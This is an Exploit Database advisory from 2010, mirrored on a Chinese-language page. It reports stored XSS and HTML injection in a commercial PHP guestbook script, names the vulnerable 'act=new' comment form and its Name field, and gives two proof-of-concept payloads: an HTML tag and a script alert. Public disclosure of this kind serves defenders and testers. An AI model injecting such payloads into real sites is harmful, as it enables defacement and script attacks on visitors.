Guestbook Script PHP – Cross-Site Scripting / HTML Injection

• Exploit Database
• 205 阅读

• 作者： AnTi SeCuRe
  日期： 2010-08-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14648/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36

  ======================================================================= # GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities ======================================================================= =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ################################# #_____ ____/___/# # / ___/ \ \/ / / / # #(__) \ \/ / / /# # /____/ \__/ /_/ # ################################# # Vendor: http://www.guestbookscripts.com/demo_guestbook.php # Date: 2010-08-15 # Author: AnTi SeCuRe # Greets: Sa-ViRuS.CoM , RENO , Dr.php , ! BaD BoY ! , Gov.HaCker , Dr.$audi all Sa-ViRuS.CoM Members .. # Contact: AnTi-SeCuRe@HoTMaiL.CoM # Home: WwW.Sa-ViRuS.CoM ########################################################################   [~]Note : Its not free ,, Its By 17,99 [~]You Can Buy It From : http://www.guestbookscripts.com/buy_guestbook.php     [~] HTML Injection Vuln . : http://server/demo_guestbook.php?act=new Add A New Comment And The exploit is in Name :) <p align="center"><b>Sa-ViRuS.CoM</b></p>       [~] Xss Vuln. : http://server/demo_guestbook.php?act=new Add A New Comment And The exploit is in Name :) <script>alert(&apos;AnTi SeCuRe - Sa-ViRuS.CoM&apos;)</script>       Thx To : Allah